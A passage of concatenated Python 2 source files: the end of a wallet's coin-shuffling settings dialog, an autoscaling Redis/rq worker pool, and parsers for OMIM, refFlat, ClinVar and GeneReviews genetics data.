self.errLabel.setAlignment(Qt.AlignCenter)
vbox.addWidget(self.errLabel)
vbox.addStretch()
vbox.addLayout(Buttons(CancelButton(self),
EnterButton(_("Defaults"), self.default),
EnterButton(_("Apply"), self.apply),
))
self.resize(320,200)
self.fromConfig()
# DEBUG Qt destruction
destroyed_print_error(self)
def _decimal_point(self): return get_config().get('decimal_point', 8)
def _fmt_amt(self, amt): return format_satoshis_plain(amt, self._decimal_point())
def apply(self):
lower, upper = self.minEdit.get_amount(), self.maxEdit.get_amount()
if not lower or not upper or upper <= lower:
self.setErr(_("Invalid amount"))
return
hard_upper = BackgroundShufflingThread.hard_upper_bound()
if upper > hard_upper:
self.setErr(_("Upper limit is {}").format(self._fmt_amt(hard_upper)))
return
hard_lower = BackgroundShufflingThread.hard_lower_bound()
if lower < hard_lower:
self.setErr(_("Lower limit is {}").format(self._fmt_amt(hard_lower)))
return
if (lower, upper) != tuple(BackgroundShufflingThread.update_lower_and_upper_bound_from_config()):
pre = ''
if (lower, upper) == self._get_defaults():
BackgroundShufflingThread.reset_lower_and_upper_bound_to_defaults()
pre = _("Default values restored.\n\n")
else:
actual_lower, actual_upper = BackgroundShufflingThread.set_lower_and_upper_bound(lower, upper)
if (lower, upper) != (actual_lower, actual_upper):
pre = _("Actual amounts applied: {} and {}.\n\n").format(self._fmt_amt(actual_lower),
self._fmt_amt(actual_upper))
self.show_message(pre+_("Changes will take effect when the next shuffle round starts (usually within in a few minutes)."))
self.accept()
def fromConfig(self):
lower, upper = BackgroundShufflingThread.update_lower_and_upper_bound_from_config()
self.minEdit.setAmount(lower)
self.maxEdit.setAmount(upper)
self.clearErr()
def _get_defaults(self): return BackgroundShufflingThread.DEFAULT_LOWER_BOUND, BackgroundShufflingThread.DEFAULT_UPPER_BOUND
def default(self):
lower, upper = self._get_defaults()
self.minEdit.setAmount(lower)
self.maxEdit.setAmount(upper)
self.clearErr()
def setErr(self, txt='', noerr=False):
txt = txt or ""
if noerr:
try: color = ColorScheme.DEFAULT._get_color(0)
except AttributeError: color = "#666666"
else:
try: color = ColorScheme.RED._get_color(0)
except AttributeError: color = "red"
self.errLabel.setText('<font color="{}">{}</font>'.format(color, txt))
def clearErr(self): self.setErr('', noerr=True)
# /CoinSelectionSettingsWindow
|
pool.py
|
# -*- coding: utf-8 -*-
import time
import os
import signal
import random
import redis
import rq
import psutil
from Queue import Empty
from .log import logger
from .worker import Worker
from .accounting import PoolAccounting
from multiprocessing import Process, Queue
log = logger()
def msg_exit(wname):
return {'msg': 'exit', 'pid': os.getpid(), 'wname': wname}
def msg_update(wname):
return {'msg': 'update', 'pid': os.getpid(), 'wname': wname}
def msg_failed(wname):
return {'msg': 'failed', 'pid': os.getpid(), 'wname': wname}
def msg_started(wname):
return {'msg': 'started', 'pid': os.getpid(), 'wname': wname}
def _worker(wname, pool_queue, args):
log.debug("Worker %s started" % wname)
try:
pool_queue.put(msg_started(wname))
def exc_handler(job, *args):
log.error("Job %s Excepted" % (job.id))
def work_callback(job):
log.debug("Worker %s completed job %s %s" % (
wname, job.id, job.status))
if job.status == rq.job.Status.FAILED:
pool_queue.put(msg_failed(wname))
else:
pool_queue.put(msg_update(wname))
def status_callback():
"""
Controls execution of worker. Worker will exit when queue
is empty if this callback returns False
"""
if args['retire_idle']:
return False
return True
con = redis.StrictRedis(
host=args['host'], port=args['port'], password=args['password'],
db=args['db'])
queues = [rq.Queue(q, connection=con) for q in args['queues']]
rqw = Worker(
queues,
status_callback=status_callback,
exc_handler=exc_handler,
work_callback=work_callback,
connection=con)
rqw.log = log
rqw.work()
finally:
pool_queue.put(msg_exit(wname))
log.debug("Worker %s exited" % wname)
def enum(name, *sequential, **named):
values = dict(zip(sequential, range(len(sequential))), **named)
return type(name, (), values)
WorkerState = enum('WorkerState', STARTING='starting', RUNNING='running', TERMINATED='terminated')
class Pool:
def __init__(
self, queues, host='localhost', port=6379, db=None,
password=None, zombie_timeout=400, **kwargs):
self.acct = PoolAccounting()
self.count = 0
self.workers = {}
# Lower limit on workers
self.min_procs = kwargs.setdefault('min_procs', 1)
# Upper limit on workers
self.max_procs = kwargs.setdefault('max_procs', 128)
# Maximum number of workers to start in a single round of scaling
self.max_per_scale = kwargs.setdefault('max_per_scale', 2)
# Seconds between updates before a worker is considered a zombie
self.zombie_timeout = zombie_timeout
# Minimum wait between spawns of new workers
self.scale_frequency = kwargs.setdefault('scale_frequency', 10.0)
# Maximum number of seconds waiting before we send a kill -9
self.terminate_seconds = kwargs.setdefault('terminate_seconds', 10.0)
# Number of seconds to wait while gathering initial stats on workers
# before scaling up
self.quiet_period_seconds = kwargs.setdefault(
'quiet_period_seconds', 10.0)
# Maximum cpu utilization
self.max_cpu = kwargs.setdefault('max_cpu', 80.0)
# Maximum mem utilization
self.max_mem = kwargs.setdefault('max_mem', 80.0)
self.args = kwargs
# Should workers without a job to do be spun down immediately?
self.args['retire_idle'] = kwargs.setdefault('retire_idle', True)
self.args['queues'] = queues
self.args['host'] = host
self.args['port'] = port
self.args['password'] = password
self.args['db'] = db
self.args['main_pid'] = os.getpid()
# Workers we've scaled down and are waiting on exiting
self.waiting_scale_down = []
self.stats = []
self.pool_queue = Queue()
self.con = redis.StrictRedis(
host=self.args['host'], port=self.args['port'], password=self.args['password'],
db=self.args['db'])
self.rqs = [rq.Queue(q, connection=self.con) for q in self.args['queues']]
def start(self):
self.start_time = time.time()
self.establish_baseline()
self.acct.start()
while True:
num_running, num_starting = self.update_workers()
self.acct.set_workers(num_running)
self.update_stats(num_running, num_starting)
total = num_running + num_starting
log.debug("Pool has %s active workers (%s starting)" % (
num_running, num_starting))
if num_running < self.min_procs:
self.add_worker()
else:
self.scale_pool(total)
time.sleep(1)
self.process_queue()
self.acct.log()
def establish_baseline(self):
cpu = []
mem = []
log.debug("Establishing a baseline reading for cpu & memory...")
for i in range(5):
cpu_pct = psutil.cpu_percent()
mem_pct = psutil.virtual_memory().percent
cpu.append(cpu_pct)
mem.append(mem_pct)
time.sleep(1)
self.baseline_cpu = sum(cpu) / float(len(cpu))
self.baseline_mem = sum(mem) / float(len(mem))
log.debug("Baseline cpu & memory reading: %s CPU %s Memory" % (
self.baseline_cpu, self.baseline_mem))
def process_queue(self):
while True:
try:
obj = self.pool_queue.get_nowait()
wname = obj['wname']
if wname not in self.workers:
log.warning("Received message %s from unknown %s" % (
obj, wname))
continue
worker = self.workers[wname]
if obj['msg'] == 'update':
worker['last_update'] = time.time()
elif obj['msg'] == 'exit':
log.debug("Worker %s exited" % worker['w'].name)
self.on_worker_exit(wname)
elif obj['msg'] == 'started':
worker['state'] = WorkerState.RUNNING
log.debug("Worker %s became ready" % worker['w'].name)
elif obj['msg'] == 'failed':
log.debug("Worker %s reported failure" % worker['w'].name)
worker['last_update'] = time.time()
self.acct.add_failed()
except Empty:
break
def count_outstanding_queue(self):
cnt = 0
for queue in self.rqs:
cnt += queue.count
return cnt
def on_worker_exit(self, wname):
self.acct.add_exited()
worker = self.workers[wname]
if worker in self.waiting_scale_down:
self.waiting_scale_down.remove(worker)
del self.workers[wname]
def update_stats(self, num_running, num_starting):
cpu_pct = psutil.cpu_percent()
mem_pct = psutil.virtual_memory().percent
log.debug("CPU %s Memory %s" % (cpu_pct, mem_pct))
self.stats.append((num_running, num_starting, cpu_pct, mem_pct))
if len(self.stats) > 30:
self.stats.pop(0)
def scale_pool(self, total_workers):
# Collect enough stats to matter
if (time.time() - self.start_time) < self.quiet_period_seconds:
return
# Don't scale too frequently
if time.time() - self.last_scale < self.scale_frequency:
return
outstanding = self.count_outstanding_queue()
log.debug("Outstanding queue length %s" % outstanding)
if not outstanding:
return
cpu_per_running = 0
mem_per_running = 0
for num_running, num_starting, cpu_pct, mem_pct in self.stats:
if num_running:
cpu_per_running += ((cpu_pct - self.baseline_cpu) / float(num_running))
mem_per_running += ((mem_pct - self.baseline_mem) / float(num_running))
avg_cpu_per_running = max(float(cpu_per_running) / len(self.stats), 0.01)
avg_mem_per_running = max(float(mem_per_running) / len(self.stats), 0.01)
cpu_pct = psutil.cpu_percent()
mem_pct = psutil.virtual_memory().percent
log.debug("CPU %s Mem %s AvgC/R %s AvgM/R %s" % (
cpu_pct, mem_pct, avg_cpu_per_running, avg_mem_per_running))
cpu_workers = (self.max_cpu - cpu_pct) / avg_cpu_per_running
mem_workers = (self.max_mem - mem_pct) / avg_mem_per_running
avail_workers = int(min(
self.max_procs - total_workers, min(cpu_workers, mem_workers)))
log.debug("%s CPU Bound Worker %s Mem Bound Worker %s Potential Workers" % (
cpu_workers, mem_workers, avail_workers))
delta = min(avail_workers, self.max_per_scale)
self.scale_pool_delta(total_workers, delta)
def scale_pool_delta(self, total_workers, delta):
if delta > 0:
log.debug("Starting %s workers" % delta)
for i in range(delta):
self.add_worker()
elif delta < 0:
log.debug("Should scale down the number of workers")
if self.waiting_scale_down:
log.debug("Already waiting on %s to scale down" % (
len(self.waiting_scale_down)))
return
to_kill = min(abs(delta), self.max_procs)
# Make sure we leave the desired min procs running
if to_kill >= (total_workers - self.min_procs):
# 8 Running 6 To kill 2 Min = 0 = 6
# 8 Running 8 to kill 2 min = -2 = 6
to_kill += (total_workers - to_kill) - self.min_procs
if to_kill <= 0:
log.debug(
"Cannot kill any more, would leave us below min procs")
return
for wname in random.sample(self.workers.keys(), to_kill):
worker = self.workers[wname]
self.waiting_scale_down.append(worker)
self.terminate_worker(worker)
def update_workers(self):
num_running = 0
num_starting = 0
waiting_terminate = 0
for wname, worker in self.workers.items():
state = worker['state']
since_update = time.time() - worker['last_update']
if state == WorkerState.TERMINATED:
if (time.time() - worker['terminate_time']) > self.terminate_seconds:
log.warning(
"Worker %s didn't terminate, sending SIGKILL" % (
wname))
self.really_terminate_worker(worker)
else:
waiting_terminate += 1
elif state == WorkerState.RUNNING:
if since_update > self.zombie_timeout:
log.info("Worker %s zombied" % (worker['w'].name))
self.terminate_worker(worker)
self.acct.add_zombie()
else:
num_running += 1
elif state == WorkerState.STARTING:
num_starting += 1
self.acct.set_waiting_terminate(waiting_terminate)
return num_running, num_starting
def terminate_worker(self, worker):
worker['state'] = WorkerState.TERMINATED
worker['terminate_time'] = time.time()
worker['w'].terminate()
def really_terminate_worker(self, worker):
try:
os.kill(worker['w'].pid, signal.SIGKILL)
os.kill(worker['w'].pid, signal.SIGKILL)
except:
pass
finally:
self.on_worker_exit(worker['w'].name)
def add_worker(self):
wname = "PySplash-%s" % self.count
w = Process(target=_worker, args=(wname, self.pool_queue, self.args))
w.name = wname
self.count += 1
worker = {}
worker['state'] = WorkerState.STARTING
worker['last_update'] = time.time()
worker['w'] = w
self.workers[w.name] = worker
self.last_scale = time.time()
w.start()
|
parser.py
|
# encoding: utf-8
import os
import re
import StringIO
from ftplib import FTP
from lxml import etree
from Queue import Queue
from threading import Thread
import json
import urllib3
from openpyxl import load_workbook
urllib3.disable_warnings()
def test():
print "测试导入"
# 把所有解析文件的处理都写到这里
class ParseMim2gene(object):
"""
解析mim2gene.txt文件一条记录,一条记录为一行
"""
def __init__(self, chunk):
self.record = {}
self.parse_mim2gene(chunk)
def parse_mim2gene(self, chunk):
items = chunk.split("\t")
self.mimNumber = int(items[0])
self.type = items[1]
try:
self.approvedGeneSymbol = items[3]
except:
self.approvedGeneSymbol = None
class ParseRefFlat(object):
"""
解析整个refFlat.txt文件
"""
def __init__(self, fp, debug=False):
if not os.path.exists(fp): raise Exception("%s not exists" % fp)
self.gene = {}
self.debug = debug
self.filename = fp
self.parse_refflat()
def parse_refflat(self):
if self.debug: print "Parsing filename %s" % self.filename
with open(self.filename) as f:
for line in f:
match = re.search("(\S+)\t(\S+)\tchr(\S+)\t(\S)\t(\d+)\t(\d+)\t(\d+)\t(\d+)\t(\d+)\t(\S+)\t(\S+)", line)
#match = re.search("(\S+)\t\S+\tchr(\S+)\t(\S)\t(\d+)\t(\d+)", line)
if match:
pos = {
'geneName': match.group(1), 'name': match.group(2), 'chrom': match.group(3), 'strand': match.group(4),
'txStart': int(match.group(5)), 'txEnd': int(match.group(6)), 'cdsStart': int(match.group(7)),
'cdsEnd': int(match.group(8)), 'exonCount': int(match.group(9)),
'exonStarts': list(map(int, match.group(10).rstrip(',').split(','))),
'exonEnds': list(map(int, match.group(11).rstrip(',').split(',')))
#'name': match.group(1), 'chr': match.group(2), 'strand': match.group(3),
#'start': int(match.group(4)), 'end': int(match.group(5))
}
if re.match("^([1-9]|1[0-9]|2[0-2]|[XY])$", pos['chrom']):
if self.gene.has_key(pos['geneName']):
self.gene[pos['geneName']].append(pos)
else:
self.gene[pos['geneName']] = [pos]
if self.debug: print "Parsing filename Done"
def make_changes(self, symbol):
if self.debug: print "Make changes for %s(TO OMIM Genemaps)" % symbol
symbolist = list(map(str,range(1,23)))
symbolist.extend(['X','Y'])
symbol2chr = dict(zip(symbolist, list(range(1,25))))
try:
gene = self.gene[symbol]
except KeyError,e:
print "Not found key %s" % e
return {}
chrom = gene[0]['chrom']; strand = gene[0]['strand']
start = min(list(map(lambda x: x['txStart'], gene)))
end = max(list(map(lambda x: x['txEnd'], gene)))
changes = { # 这里起始位置用所有坐标最小值,终止位置为最大值,力求包含所有区域
"approvedGeneSymbol": symbol,
'chromosome': symbol2chr[chrom],
'chromosomeSymbol': chrom,
'chromosomeLocationStart': start,
'chromosomeLocationEnd': end,
'chromosomeLocationStrand': strand
}
return changes
class ParseGenemap(object):
"""
解析genemap.txt文件的一条记录,一条记录即为一行
"""
def __init__(self, chunk):
self.record = {}
self.parse_genemap(chunk)
def parse_genemap(self, chunk):
item = chunk.split("\t")
(chrnum, seqid) = item[0].split(".")
chr_symbols = list(range(23))
chr_symbols.extend(["X","Y"])
self.record['chromosome'] = int(chrnum)
self.record['chromosomeSymbol'] = str(chr_symbols[int(chrnum)])
self.record['sequenceID'] = int(seqid)
headers = 'month day year cytoLocation geneSymbols confidence \
title mimNumber mappingMethod comments disorders \
mouseGeneSymbol references'.split()
for i in range(len(headers)):
try:
if headers[i] == "mimNumber":
self.record[headers[i]] = int(item[i+1])
elif headers[i] == 'confidence':
self.record[headers[i]] = item[i+1].upper()
elif re.search("month|day|year",headers[i]):
continue
else:
self.record[headers[i]] = item[i+1]
except IndexError:
pass
except:
raise Exception("在解析genemap.txt时发生未知错误")
class ParseMorbidmap(object):
"""
解析morbidmap.txt文件的一条记录,一条记录为一行
"""
def __init__(self, chunk):
self.record = {}
self.parse_morbidmap(chunk)
def parse_morbidmap(self, chunk):
items = chunk.split("\t")
try:
phenotype_desc = items[0]
self.record['geneSymbols'] = items[1]
self.record['mimNumber'] = int(items[2])
self.record['cytoLocation'] = items[3]
if re.match("(.*)\,\s(\d{6})\s?\((\d+)\)", phenotype_desc):
get = re.match("(.*)\,\s(\d{6})\s?\((\d+)\)", phenotype_desc)
self.record['phenotype'] = get.group(1)
self.record['phenotypeMimNumber'] = int(get.group(2))
self.record['phenotypeMappingKey'] = int(get.group(3))
elif re.match("(.*)\,\s(\d{6})", phenotype_desc):
get = re.match("(.*)\,\s(\d{6})", phenotype_desc)
self.record['phenotype'] = get.group(1)
self.record['phenotypeMimNumber'] = int(get.group(2))
elif re.match("(.*)\s?\((\d+)\)", phenotype_desc):
get = re.match("(.*)\s?\((\d+)\)", phenotype_desc)
self.record['phenotype'] = get.group(1)
self.record['phenotypeMimNumber'] = self.record['mimNumber']
self.record['phenotypeMappingKey'] = int(get.group(2))
else:
self.record['phenotype'] = phenotype_desc
self.record['phenotypeMimNumber'] = self.record['mimNumber']
except Exception, e:
print e
print "出现错误"
print chunk
class ParseEntryDownload(object):
"""
输入文件第一列为需要下载的mimNumber
"""
def __init__(self, filepath):
self.mims = []
if not os.path.exists(filepath): raise Exception(filepath + " not exists")
self.parse_entry_downloadlist(filepath)
def parse_entry_downloadlist(self, filepath):
with open(filepath) as f:
for line in f:
items = line.rstrip().lstrip().split()
if re.match("\d{6}", items[0]):
self.mims.append(int(items[0]))
class ParseEntry(object):
"""
解析omim.txt文件的一条记录以**RECORD**作为分割
"""
def __init__(self, chunk):
self.record = {}
self.parse_entry(chunk)
def parse_entry(self, chunk):
for field in chunk.split("*FIELD*"):
if not field: continue
if field == "\n": continue
content = StringIO.StringIO(field)
header = content.next().rstrip().lstrip()
if header.upper().find("NO") != -1:
self.header_no(content);
elif header.upper().find("TI") != -1:
self.header_ti(content)
elif header.upper().find("TX") != -1:
self.header_tx(content)
elif header.upper().find("SA") != -1:
self.header_sa(content)
elif header.upper().find("RF") != -1:
self.header_rf(content)
elif header.upper().find("CS") != -1:
self.header_cs(content)
elif header.upper().find("CN") != -1:
self.header_cn(content)
elif header.upper().find("CD") != -1:
self.header_cd(content)
elif header.upper().find("ED") != -1:
self.header_ed(content)
elif header.upper().find("AV") != -1:
self.header_av(content)
else:
raise Exception(header + u"没有对应的解析器!!")
def header_cs(self, content):
#pass
record_cs = {}
record_cs['mimNumber'] = self.record['mimNumber']
record_cs['prefix'] = self.record['prefix']
record_cs['preferredTitle'] = self.record['title']['preferredTitle']
record_cs['oldFormatExists'] = False
text = content.read().lstrip().rstrip()
if not text: return
items = [ re.sub("\s+", " ", n.replace(":","")).lstrip().rstrip() for n in re.split("([A-z, ]+\:\n)",text)]
if not items[0]: items.pop(0)
number = len(items)/2.
if number.is_integer():
for i in range(int(number)):
key = items[2*i]
cs_content = items[2*i+1]
if re.match(\
"INHERITANCE|GROWTH|HEAD AND NECK|CARDIOVASCULAR|RESPIRATORY|CHEST|ABDOMEN|GENITOURINARY|SKELETAL|SKIN\, NAILS\, HAIR|\
MUSCLE.*SOFT.*TISSUE|NEUROLOGIC|VOICE|METABOLIC FEATURES|ENDOCRINE FEATURES|HEMATOLOGY|IMMUNOLOGY|NEOPLASIA|PRENATAL MANIFESTATIONS|\
LABORATORY ABNORMALITIES|MISCELLANEOUS|MOLECULAR BASIS",\
key):
if not cs_content: continue
key_attr = key.title().replace(" ","")
key_attr = key_attr[0].lower() + key_attr[1:]
innercontent = re.split('(\[[^;]+\]\;)', cs_content)
if not innercontent[0]: innercontent.pop(0)
if len(innercontent) % 2: #有键的介绍
key_desc = innercontent.pop(0)
else:
key_desc = ""
record_cs[key_attr+'Exists'] = True
if key_desc: record_cs[key_attr] = key_desc
if not len(innercontent): continue
for i in range(int(len(innercontent)/2)):
#sub_key = innercontent[2*i]
#sub_conntent = innercontent[2*i+1]
sub_attr = key_attr + re.sub("\[|\];|,","",innercontent[2*i].title()).replace(" ","")
record_cs[sub_attr+"Exists"] = True
record_cs[sub_attr] = innercontent[2*i+1].lstrip().rstrip()
else:
record_cs['oldFormatExists'] = True
try:
record_cs['oldFormat'][key] = cs_content
except:
record_cs['oldFormat'] = {key:cs_content}
self.record['clinicalSynopsis'] = record_cs
self.record['clinicalSynopsisExists'] = True
else:
#raise Exception(u"CS域的值非偶数")
print u"CS域的值非偶数,因此不导入数据库".encode('utf-8').strip()
def header_av(self, content):
self.record['allelicVariantExists'] = True
rawList = re.split("\n\.(\d{4})\n","\n" + content.read().lstrip().rstrip())
if not rawList[0]: rawList.pop(0)
number = int(len(rawList)/2)
allelicVariantList = []
for i in range(number):
allele = rawList[2*i]
text = rawList[2*i+1].lstrip().rstrip()
hashlist = {'number': int(allele)}
try:
index = text.index("\n")
name = text[0:index]
splittext = re.split("\n\n",text[index+1:])
allelenamestr = splittext.pop(0)
allelenamelist = re.split(";;", allelenamestr)
if len(allelenamelist) > 1:
hashlist['alternativeNames'] = ";;".join(allelenamelist[:-1])
hashlist['mutations'] = allelenamelist[-1]
else:
hashlist['mutations'] = allelenamelist[-1]
hashlist['text'] = "\n".join([ n.lstrip().rstrip().replace("\n"," ") for n in splittext])
except:#只有一行,应该是moved或者removed
name = text
if name.lower().find("removed") != -1:
status = 'removed'
elif name.lower().find("moved") != -1:
status = "moved"
else:
status = 'live'
hashlist['name'] = name
hashlist['status'] = status
#print hashlist
allelicVariantList.append(hashlist)
self.record['allelicVariantList'] = allelicVariantList
def header_ed(self, content):
self.record['editHistory'] = content.read().lstrip().rstrip()
def header_cd(self,content):
self.record['createDate'] = content.read().lstrip().rstrip()
def header_cn(self,content):
self.record['contributors'] = content.read().lstrip().rstrip()
def header_rf(self,content):
rfrecords = []
rflist = [n.replace("\n"," ") for n in re.split("\r?\n\r?\n", content.read())]
for rf in rflist:
if not rf:
continue
#get = re.match("(\d+)\.\s+([^:]+)\:\s+([^\.]+)[\.\?]+[\s']+(.*)", rf)
# 不再添加source
get = re.match("(\d+)\.\s+([^:]+)\:\s+(.+)", rf)
try:
refnumber = int(get.group(1))
authors = get.group(2)
title = get.group(3)
source = ""
except:
print "$$$$ ->", rf
#get = re.match("(\d+)\.\s+([^:]+)\:\s+([^\.]+(\.[^\.]+)*)[\.\?]+[\s']+(\D.*)",rf)
continue
rfrecords.append({
'reference' : {
'referenceNumber' : refnumber,
'authors' : authors,
'title' : title,
'source' : source
}
})
#if int(get.group(1)) == 1: print rf
self.record['referenceList'] = rfrecords
def header_sa(self,content):
self.record['seeAlso'] = content.read().lstrip().rstrip().replace("\n"," ")
def header_tx(self,content):
self.record['textSectionList'] = []
all = content.read()
values = [ n.lstrip().rstrip().replace("\n", " ") for n in re.split("\n[A-Z\s]+\n", all)]
if not values[0]: values.pop(0)
keys = [ n.lstrip().rstrip().replace("\n", "") for n in re.findall("\n[A-Z\s]+\n", all)]
if not len(keys):
self.record['textSectionList'].append({
'textSectionName' : 'text',
'textSectionTitle' : 'Text',
'textSectionContent' : values[0]
})
return
for i in range(len(keys)):
textsectionname = keys[i].title().replace(" ","")
textsectionname = textsectionname[0].lower() + textsectionname[1:]
self.record['textSectionList'].append({
'textSectionName' : textsectionname,
'textSectionTitle' : keys[i].title(),
'textSectionContent' : values[i]
})
def header_ti(self,content):
th = content.next().rstrip().lstrip()
fieldcontent = {}
get = re.match("(\S?)\d+\s(.*)",th)
self.record['prefix'] = get.group(1)
self.record['title'] = { 'preferredTitle': get.group(2) }
move = re.match("MOVED TO (\d+)", get.group(2))
remove = re.match("REMOVED", get.group(2))
if remove:
self.record['status'] = "removed"
elif move:
self.record['status'] = "moved"
self.record['movedTo'] = int(move.group(1))
else:
self.record['status'] = 'live'
remind = content.read().replace("\n"," ")
if remind: self.record['title']['alternativeTitles'] = remind
def header_no(self,content):
mimnumber = content.next().rstrip().lstrip()
self.record['mimNumber'] = int(mimnumber)
print "Go throught mim", self.record['mimNumber']
class ParseClinVar(object):
"""
解析ClinVarFullRelease_00-latest.xml文件,生成可以导入mongo数据库的dict格式。
这个一个大型文件,需要用到一定的处理方式来确保运行效率
"""
def __init__(self, filename, debug=False):
if not os.path.exists(filename): raise Exception("%s not exist!" % filename)
self.filename = filename
self.debug = debug
self._count = 0
def __enter__(self):
return self;
def __exit__(self ,type, value, traceback):
return False
def __iter__(self):
try:
if self.fileiter.closed:
self.fileiter = open(self.filename)
else:
self.fileiter.close()
self.fileiter = open(self.filename)
except AttributeError,e:
self.fileiter = open(self.filename)
return self._parseclinvar()
def _parseclinvar(self):
parseflag = False
buf = ""
for line in self.fileiter:
if re.match("<ClinVarSet .*>", line):
parseflag = True
buf += line
elif re.match("</ClinVarSet>", line):
parseflag = False
buf+= line
# 开始解析buf生成结果,然后yield回去
xmltree = etree.fromstring(buf)
yield self._generate(xmltree)
# 初始化
buf = ""
elif parseflag:
buf += line
else:
pass
#print line
def _generate(self, clinvar):
"""
传递一条记录的xml tree对象,解析后生成需要的字典
"""
self._count += 1
if not self._count%2000: print "parse count: %s" % self._count
RCVA = clinvar.find("ReferenceClinVarAssertion")
CVAs = clinvar.findall("ClinVarAssertion")
CVA = RCVA.find("ClinVarAccession")
rcv_accession = CVA.attrib['Acc']
Measure = RCVA.find('MeasureSet').find('Measure')
Name = Measure.find('Name')
if Name is None: return {}
type_ = Measure.attrib['Type']
if not (type_ == "Deletion" or\
type_ == "Duplication" or\
type_ == "copy number gain" or\
type_ == "copy number loss"):
return {}
clinsign = RCVA.find("ClinicalSignificance").find("Description").text
if clinsign.lower().find("pathogenic") == -1: return {}
CL = Measure.find("CytogeneticLocation")
Origin = RCVA.find("ObservedIn").find("Sample").find("Origin")
TS = RCVA.find("TraitSet").find("Trait")
allele_id = Measure.attrib['ID']
date_update = CVA.attrib['DateUpdated']
origin = Origin.text
name = Name.find('ElementValue').text
if CL is not None:
cytogenetic = CL.text
else:
cytogenetic = ""
seq_locations = Measure.findall("SequenceLocation")
(assembly, chrsymbol, start, end) = ('', '', -2, -2)
if not seq_locations:
seq_locations = list(Measure.iterdescendants("SequenceLocation"))
if not len(seq_locations) and self.debug:
print "\n1. %s does not have SequenceLocation\n" % rcv_accession
for seq_loc in seq_locations:
if seq_loc.attrib['Assembly'] == 'GRCh37':
chrsymbol = seq_loc.attrib['Chr']
assembly = seq_loc.attrib['Assembly']
start = seq_locations[0].attrib.get("innerStart",seq_locations[0].attrib.get("start",-1))
end = seq_locations[0].attrib.get("innerStop",seq_locations[0].attrib.get("stop",-1))
break
pubmeds = []
for item in CVAs:
for cit in item.iterdescendants("Citation"):
idd = cit.find("ID")
if idd is not None and idd.attrib['Source'] == 'PubMed':
pubmeds.append(idd.text)
pubs = ",".join(pubmeds)
genereview = ""
if TS.find('AttributeSet') is not None and TS.find('AttributeSet').find("XRef") is not None:
if TS.find('AttributeSet').find("XRef").attrib['DB'] == 'GeneReviews':
genereview = TS.find('AttributeSet').find("XRef").attrib['ID']
if (start == -2 or end == -2) and self.debug:
print "\n2. %s start and end have not been modified" % rcv_accession
if (start == -1 or end == -1) and self.debug:
print "\n3. %s does not find start and end in node" % rcv_accession
doc_hash = {
"allele_id": allele_id, "type": type_, "name": name,
"rcv_accession": rcv_accession, "clinsign":clinsign, "origin": origin,
"assembly": assembly, "chr": chrsymbol, "start": start, 'end': end,
"cytogenetic":cytogenetic, "date_update":date_update,"pubmeds":pubs,
"gene_reviews":genereview,
}
return doc_hash
def next(self):
return self.__next__()
def __next__(self):
print "good"
class ParseGeneReview(object):
"""
下载ftp://ftp.ncbi.nih.gov/pub/GeneReviews/GRshortname_NBKid_genesymbol_dzname.txt 文件,并解析出需要的内容
"""
def __init__(self, url, path, filename, debug = False, nthread = 10):
self.url = url
self.path = path
self.filename = filename
self.ftp = FTP(url)
self._data = []
self.queue = Queue()
self.thread = []
self.http = urllib3.PoolManager()
self.debug = debug
self.nthread = nthread
for i in range(self.nthread):
worker = Thread(target=self._update_location, args=(i,))
worker.setDaemon(True)
self.thread.append(worker)
if debug:
print "生成ParserGeneReview对象"
def _update_location(self, num):
while True:
if self.debug: print "Worker %s is working" % num
if self.queue.qsize() == 0:
if self.debug: print "队列为空"
break
one = self.queue.get()
url = "http://grch37.rest.ensembl.org/lookup/symbol/homo_sapiens/%s?content-type=application/json" % one['gene_symbol']
try:
if self.debug: print "下载%s" % one['gene_symbol']
tx = self.http.request('GET', url)
if tx.status == 200:
data = json.loads(tx.data.decode('utf-8'))
one['chr'] = data['seq_region_name']
one['end'] = int(data['end'])
one['start'] = int(data['start'])
elif tx.status == 400:
if self.debug: print "%s is not find in web" % (one['gene_symbol'])
else:
raise Exception("下载%s坐标失败" % one['gene_symbol'])
except Exception,e:
if self.debug: print "[Error] for get %s\n%s" % (url, e)
finally:
self.queue.task_done()
def _handle_binary(self, more_data):
self._data.append(more_data)
def download(self):
if self.debug: print "Begin downloading"
self.ftp.login()
self.ftp.cwd(self.path)
self.ftp.retrbinary("RETR " + self.filename , callback=self._handle_binary)
if self.debug:
print "Finish downloading"
print "Generate genes dict"
self.data = "".join(self._data).split("\n")
if self.data[-1] == "":
self.data.pop(-1)
genes = {}
for item in self.data:
items = item.split("|")
if items[2] == '-' or items[2] == 'Not applicable':
continue
else:
try:
try:
items[3].encode("utf8")
genes[items[2]]['accession_0'].append(items[1])
genes[items[2]]['description_0'].append(items[3])
except UnicodeDecodeError,e:
continue
except KeyError,e:
try:
items[3].encode("utf8")
genes[items[2]] = {"accession_0": [items[1]], 'description_0': [items[3]], 'gene_symbol': items[2]}
except UnicodeDecodeError,e:
continue
for key,value in genes.iteritems():
value['accession'] = ";".join(value['accession_0'])
value.pop('accession_0')
value['description'] = ";".join(value['description_0'])
value.pop("description_0")
self.genes = genes
if self.debug:
print "Finish generation"
def download_location(self):
if self.debug:
print "Begin update location info"
try:
self.genes
except:
self.download()
for one in self.genes.itervalues():
self.queue.put(one)
for worker in self.thread:
worker.start()
for worker in self.thread:
worker.join()
self.queue.join()
def __iter__(self):
try:
return self.genes.itervalues()
except Exception,e:
self.download()
self.download_location()
return self.genes.itervalues()
class ParsePubmed(object):
"""
通过输入文件解析生成可以导入pubmed表的数据,文件一般有刘二红或李东双给出
"""
def __init__(self, filename, debug=False):
if not os.path.exists(filename):
raise Exception("%s not exists!" % filename)
self.filename = filename
self.debug = debug
def generate_data(self):
wb = load_workbook(filename = self.filename)
wh = wb['Sheet1']
self.data = []
head = {
1: 'name', 2: 'gender', 6: 'location', 9: 'gainloss', 10: 'description',
11: 'pmid', 12: 'cytoband', 13: 'size', 14: 'origin_position', 15: 'critical',
16: 'hg_ver', 17: 'inheritance', 18: 'have_fulltext', 19: 'note',
20: 'extra_desc', 21: 'auditor', 22: 'comment'
}
for row in wh.iter_rows():
if row[0].value.find(u"样本信息") != -1 or row[0].value.find(u"编号") != -1:
continue
data = {};name = ""
for cell in row:
try:
head[cell.col_idx]
except KeyError,e:
cellvalue = cell.value if cell.value else 'None'
if self.debug: print "Unknown field\n\tIndex -> %s\n\tValue -> %s" % (cell.col_idx, cellvalue)
continue
if cell.col_idx == 1:
name = cell.value.encode()
elif re.search("description|cytoband|size|origin_position|critical|hg_ver|inheritance|note|extra_desc|auditor|comment",head[cell.col_idx]):
if cell.value:
data[head[cell.col_idx]] = cell.value
else:
pass
